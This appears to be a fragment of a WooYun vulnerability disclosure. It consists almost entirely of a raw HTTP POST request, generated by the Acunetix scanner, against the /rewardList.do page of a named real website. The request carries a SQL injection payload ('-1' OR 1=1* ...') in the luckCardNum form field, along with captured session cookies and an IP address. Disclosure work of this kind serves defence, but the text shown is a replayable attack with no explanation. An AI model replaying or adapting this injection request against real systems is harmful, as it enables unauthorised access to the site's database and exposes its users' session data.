WooYun.org

POST /rewardList.do HTTP/1.1
Content-Length: 717
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NDMOGETRGT
X-Requested-With: XMLHttpRequest
Referer: http://www.saclub.com.cn/
Cookie: JSESSIONID=nZV3XDkVxsWmrP2QC04Jp1rdTQjYy7Lyp9DsQ8ltjnKqb5G19tJj!15768151; Hm_lvt_6df6f9d56598e7f5e729beb6c4558e60=1459823896,1459823943,1459824204,1459824219; Hm_lpvt_6df6f9d56598e7f5e729beb6c4558e60=1459824219; LiveWSLHG31671888=6359544928882309449790; LiveWSLHG31671888sessionid=6359544928882309449790; fistvisitetime=1459823714543; lastvisitetime=1459824219215; visitecounts=1; visitepages=17; ip=124.114.79.35; ip1=%25u9655%25u897f%25u7701%25u897f%25u5b89%25u5e02; ip2=%25u7535%25u4fe1; BAIDUID=6CC5549320E8DDCEC3A571F32E99F4CB:FG=1; HMACCOUNT=F9BA16831E4645B0; ipfrom=%e9%99%95%e8%a5%bf%e7%9c%81%e8%a5%bf%e5%ae%89%e5%b8%82|%e7%94%b5%e4%bf%a1
Host: www.saclub.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_LCPDVIKIHE
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="act"
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="currentPage"
1
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="luckCardNum"
-1' OR 1=1* AND 00062=00062 or '6sY5Lc6x'='
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="luckName"
cmkssgdt
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="month"
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="monthId"
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="totalPage"
1
-------AcunetixBoundary_LCPDVIKIHE--